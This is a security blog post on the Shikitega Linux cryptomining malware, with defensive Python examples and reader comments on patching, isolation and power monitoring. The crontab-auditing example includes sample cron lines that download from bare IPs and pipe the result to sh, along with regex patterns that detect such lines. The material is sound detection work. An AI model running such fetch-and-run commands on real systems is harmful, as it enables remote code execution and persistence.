New Linux Cryptomining Malware

It’s pretty nasty:

The malware was dubbed “Shikitega” for its extensive use of the popular Shikata Ga Nai polymorphic encoder, which allows the malware to “mutate” its code to avoid detection. Shikitega alters its code each time it runs through one of several decoding loops that AT&T said each deliver multiple attacks, beginning with an ELF file that’s just 370 bytes.

Shikitega also downloads Mettle, a Metasploit interpreter that gives the attacker the ability to control attached webcams and includes a sniffer, multiple reverse shells, process control, shell command execution and additional abilities to control the affected system.

[…]

The final stage also establishes persistence, which Shikitega does by downloading and executing five shell scripts that configure a pair of cron jobs for the current user and a pair for the root user using crontab, which it can also install if not available.

Shikitega also uses cloud hosting solutions to store parts of its payload, which it further uses to obfuscate itself by contacting via IP address instead of domain name. “Without [a] domain name, it’s difficult to provide a complete list of indicators for detections since they are volatile and they will be used for legitimate purposes in a short period of time,” AT&T said.

Bottom line: Shikitega is a nasty piece of code. AT&T recommends Linux endpoint and IoT device managers keep security patches installed, keep EDR software up to date and make regular backups of essential systems.
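Because the final stage described above persists through crontab entries for both the current user and root, and fetches payload pieces from bare IP addresses, an audit of crontab listings is a cheap place to look. The following is an added example, not code from the AT&T report or the quoted article: the two listings and the addresses in them are constructed samples, and the three heuristics (bare IPv4 URL, download-then-execute, execution from a world-writable directory) are assumptions to tune for your own fleet.

```python
import re

# Constructed sample `crontab -l` output, one listing per account; the addresses
# are documentation ranges, not indicators taken from the report.
SAMPLE_CRONTABS = {
    "user": "# m h dom mon dow command\n"
            "0 3 * * * /home/user/bin/backup.sh\n"
            "*/5 * * * * curl -s http://203.0.113.10/x | sh\n"
            "@reboot /tmp/.s/run >/dev/null 2>&1\n",
    "root": "0 4 * * 0 /usr/sbin/logrotate /etc/logrotate.conf\n"
            "* * * * * wget -q -O /dev/shm/.a http://198.51.100.7/a && sh /dev/shm/.a\n",
}

# Assumed heuristics (tune to your fleet): a bare IPv4 URL, download-then-execute,
# and execution out of a world-writable directory.
IPV4_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/")
FETCH_AND_RUN = re.compile(r"\b(?:curl|wget)\b.*?(?:\||&&)\s*(?:ba)?sh\b")
WRITABLE_PATH = re.compile(r"(?:^|\s)(?:/tmp|/dev/shm|/var/tmp)/")

def audit_crontab(account, listing):
    """Return (account, line, reasons) for each scheduled command that trips a heuristic."""
    findings = []
    for raw in listing.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Either "@keyword command" or five schedule fields followed by the command.
        nfields = 2 if line.startswith("@") else 6
        parts = line.split(None, nfields - 1)
        if len(parts) < nfields:
            continue
        cmd = parts[-1]
        reasons = []
        if IPV4_URL.search(cmd):
            reasons.append("fetches from a bare IP address rather than a hostname")
        if FETCH_AND_RUN.search(cmd):
            reasons.append("downloads content and executes it immediately")
        if WRITABLE_PATH.search(cmd):
            reasons.append("runs from a world-writable directory")
        if reasons:
            findings.append((account, line, reasons))
    return findings

def audit_all(crontabs):
    # On a live host, feed this the output of `crontab -l -u <account>` per account.
    return [f for acct, text in crontabs.items() for f in audit_crontab(acct, text)]

if __name__ == "__main__":
    for account, line, reasons in audit_all(SAMPLE_CRONTABS):
        print(f"[{account}] {line}\n    " + "; ".join(reasons))
```

The same checks apply to system-wide locations such as /etc/cron.d and /etc/crontab, which have an extra user field before the command.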

Another article.

Slashdot thread.

Posted on September 12, 2022 at 9:41 AM • 6 Comments

Comments

Clive Robinson September 12, 2022 11:24 AM

@ ALL,

As I’ve said before, the first question to be asked is,

“What is the business case for this computer to be connected to publicly accessible communications?”

Usually there is no business case other than,

“It seemed like a common thing to do at the time.”

Whilst no commodity OS can be made secure, just as little or no commodity level hardware can be made secure, the *nixes used to be fairly easy to,

1, Minimise
2, Run from ROM.

Sadly those two ways of making your computer way less of a piece of hanging fruit are no longer what they were with many *nixes these days.

Plus the desire by management and marketing to do “the dumbest of things” appears to be getting way worse.

The two exploits the malware allegedly uses, “pkexec(1)”[1] and “overlayfs”[2], are niceties, not essentials on a Linux “server” or “appliance” box.

Unfortunately for “embedded systems” such as appliances and IoT boxes they “come recommended” for various reasons. The oft used argument for “overlayfs” is it makes using what is a ROM image work in RAM with minimal changes…

So you can guess what is being hit and why they’ve not been patched in a year.

@ Bruce,

Maybe you should provide a link to your previous essays on why IoT and similar not being updated or patched is such a bad idea…

[1] CVE-2021-4034 : A local privilege escalation vulnerability was found in polkit’s “pkexec(1)” utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according to predefined policies. The current version of pkexec doesn’t handle the calling parameters count correctly and ends up trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way that it’ll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation, giving unprivileged users administrative rights on the target machine.

https://linux.die.net/man/1/pkexec

[2] CVE-2021-3493 : The “overlayfs” implementation in the linux kernel did not properly validate with respect to user namespaces the setting of file capabilities on files in an underlying file system. Due to the combination of unprivileged user namespaces along with a patch carried in the Ubuntu kernel to allow unprivileged overlay mounts, an attacker could use this to gain elevated privileges.

https://wiki.archlinux.org/title/Overlay_filesystem

Clive Robinson September 12, 2022 12:22 PM

@ ALL,

As somebody is likely to pass comment such as “it’s easy to say what’s wrong, but that’s not helpful…”, I guess I’d better forestall it.

Malware is getting stealthier and stealthier “on the wire”; the simplest way to stop it is via the age old high security “Separation” and “segregation”, that is, if there is no pressing business case to connect systems, why make future trouble for yourself by doing so?

Common sense right?

So investigate separation by not having “electronic communications” paths to the outside of the organisation. Back last century this was standard practice in regulated industries including Utilities and Finance. Smart Devices and BYOD have made this difficult, but at the end of the day “they are employees”.

Separation in some cases may not be enough, especially for some –but not all– insider threats. Thus the next level up is “segregation” by “air gap” and at higher levels “energy gap”. Whilst working in a cage with your work going through “Hardware Security Modules”(HSM) to protect encryption and keys from leakage is not fun, it may be justified for some employees to carry out some parts of their jobs.

But sometimes systems have to be connected to the various forms of communications paths which side and covert channels can use.

Here you have to accept the fact that your systems will be successfully attacked and you cannot stop it happening. But that does not mean that you cannot do anything about it. There are various reasons why systems get attacked and identifying these and minimising them makes,

1, Your systems less likely to be attacked.
2, Have much less of a critical impact if they are attacked.
3, Easier to detect when they have been attacked.

It’s suggested that this malware is primarily after “CPU Resources” for crypto-coin mining. Whilst this may be true the inclusion of other code suggests that it is not the sole reason.

It’s noted that the code is not installed in one hit, but installed over many small hits to minimise visible signatures in traffic patterns and the like.

Well if it is for crypto-coin mining, it needs to do “work” and quite a lot of it. This means that energy consumption must rise and there will be other easy to spot signatures,

1, Peak Power consumption.
2, Waste energy dissipation.

If you are aware of this it’s fairly easy to “instrument” for in ways that an external attacker cannot detect or countermeasure.

Quite a lot of modern appliance and IoT boxes are switching to USB-C power supplies. You can buy very cheaply “power monitors” to put in line that show the power being consumed to better than one part in a thousand. Some can even be connected up to a computer so the power signature can be closely watched. Likewise you can get “clamp on” multimeters and oscilloscopes for very small amounts of money that are specifically designed to be connected to a stand alone computer for “data logging” and testing. I’ve quite a few just floating around in my engineering lab.

If you really want to go to town, the price of “Vector Network Analysers”(VNAs) and “Spectrum Analysers”(SAs) that connect to computers is now less than $100. Both can give you a very good level of “signal detection”.

I’ve discussed “signal detection” on this blog oh about a decade ago when outlining part of “Castles -v- Prisons” or as @Wael used to prefer “C-v-P” or just “CvP”. It was for a number of reasons “an idea ahead of its time” but parts of it appear to have “now come of age”. As I suspect the rest of it to do within half a decade at most.
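The comment above argues that mining has to show up as a sustained rise in power draw that an in-line USB-C monitor can log. As an added illustration (not code from the commenter or from any monitor vendor), here is the kind of check one would run over such a log: a robust idle baseline (median and median absolute deviation) and a flag only on excursions that persist, so a brief update or backup spike is ignored. The wattage readings are constructed, and the tuning values k and min_len are assumptions.

```python
from statistics import median

# Constructed readings (watts, one per minute) from an in-line USB-C power monitor
# on an idle appliance; minutes 10-17 model a sustained mining load. Not real data.
SAMPLE_WATTS = [4.1, 4.0, 4.2, 4.1, 4.3, 4.0, 4.1, 4.2, 4.0, 4.1,
                9.8, 9.9, 10.1, 9.7, 10.0, 9.9, 10.2, 9.8, 4.2, 4.1]

def baseline(samples, n):
    """Median and median absolute deviation of the first n samples, taken as the idle profile."""
    ref = samples[:n]
    med = median(ref)
    mad = median(abs(x - med) for x in ref) or 0.05  # floor so a flat baseline still has a band
    return med, mad

def sustained_excursions(samples, n_baseline=10, k=6.0, min_len=3):
    """(start, end) index pairs where draw stays above med + k*MAD for at least min_len samples.
    k and min_len are assumed tuning values; short spikes (updates, backups) are ignored."""
    med, mad = baseline(samples, n_baseline)
    threshold = med + k * mad
    runs, start = [], None
    for i, watts in enumerate(samples):
        if watts > threshold:
            if start is None:
                start = i
        else:
            if start is not None and i - start >= min_len:
                runs.append((start, i - 1))
            start = None
    if start is not None and len(samples) - start >= min_len:  # run still open at end of log
        runs.append((start, len(samples) - 1))
    return runs

if __name__ == "__main__":
    med, mad = baseline(SAMPLE_WATTS, 10)
    print(f"idle {med:.2f} W (MAD {mad:.2f}); sustained excursions: {sustained_excursions(SAMPLE_WATTS)}")
```

The baseline window must be captured while the device is known clean; an already compromised box would otherwise teach the detector that the mining load is normal.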

Clive Robinson September 12, 2022 12:57 PM

@ ALL,

We’ve discussed this problem before on this blog,

Have a look at,

https://www.schneier.com/blog/archives/2015/03/bios_hacking.html/#comment-243953

Where @Wael outlines what you should be considering in your battle plans.

The page is the one where our host @Bruce makes his “First IC, then to PhD, then hacker” comment.

It’s worth reading, the first half of the comments or so will show you that what in 2015 was happening to Commodity PC Motherboards back then now with a little more effort happens to embedded and IoT boxes…

tim September 12, 2022 2:37 PM

Malware is getting stealthier and stealthier “on the wire”; the simplest way to stop it is via the age old high security “Separation” and “segregation”, that is, if there is no pressing business case to connect systems, why make future trouble for yourself by doing so?

Because it’s hard and expensive. Personally I’m in year 2 of a 3 year project to lock egress down. This eats up a lot of engineering time. Most company leaders would push back on the benefits of dedicating that much time (fortunately ours don’t, but we are the exception).

You can buy very cheaply “power monitors” to put in line that show the power being consumed to better than one part in a thousand.

In the building I’m sitting in there have got to be a hundred network connected sensors that do something (and I’m not including the vending machines with cellular connections). From HVAC monitors to the elevators. How do you remotely expect an organization to manage “power monitors” for all those systems?

The simple answer is device isolation and egress filtering. But even if you don’t have that in place “crypto” miners are noisy as hell traffic wise. You’ll see the logs of systems and network devices in its path light up like a Christmas tree.

Ted September 12, 2022 5:09 PM

A Bleeping Computer article pointed out that using a legitimate cloud hosting service could increase the risk of being tracked down by law enforcement.

I was hoping for a little bit of info on the actors, regions, or devices associated with the Shikitega campaign. Interesting that the report came from AT&T Cybersecurity.

I was just reading an SEC complaint against a Bitcoin mining company.

MCC’s investor marketing materials touted its 45,198 active machines that mined Bitcoin.

Well it turns out the company didn’t mine anything. They just figured out how to keep investor money. However, if more and more crypto companies do have to register, I wonder if more info will be required about mining setups.

Clive Robinson September 13, 2022 2:16 AM

@ Ted, ALL,

Re : SEC and the Crypto-fibber.

“Well it turns out the company didn’t mine anything. They just figured out how to keep investor money.”

Would you call that Fraud?

I would; perhaps claiming it was a Ponzi scheme needs just a tad more evidence, but certainly it looks like a con.

“However, if more and more crypto companies do have to register, I wonder if more info will be required about mining setups.”

It’s an interesting point…

It’s not illegal to print securities such as bonds or even money; that is just “printing” and is actually done by many printers who have the necessary skills and tools (my father used to be the chief accountant for one some half century or so ago).

It’s the act of “passing them off” as what they are not that is the crime (along with all the following crimes down the money trail). Then there is all the fun conspiracy stuff, after all the receptionist who answers the phone is technically complicit as would be all the other employees, but are they in the know to be part of a conspiracy?

As we will probably find with Twitter, it is possible to be on the organisational governing board and not be aware of what other board members are up to…

Similar applies to stock holders.

It has been claimed that is why the SEC goes after fines not convictions… My view is somewhat different due to the likes of changes in society governance to “rent seeking” behaviours, and further the likes of “Revolving door employment” and similar creating almost a conspiracy of its own…
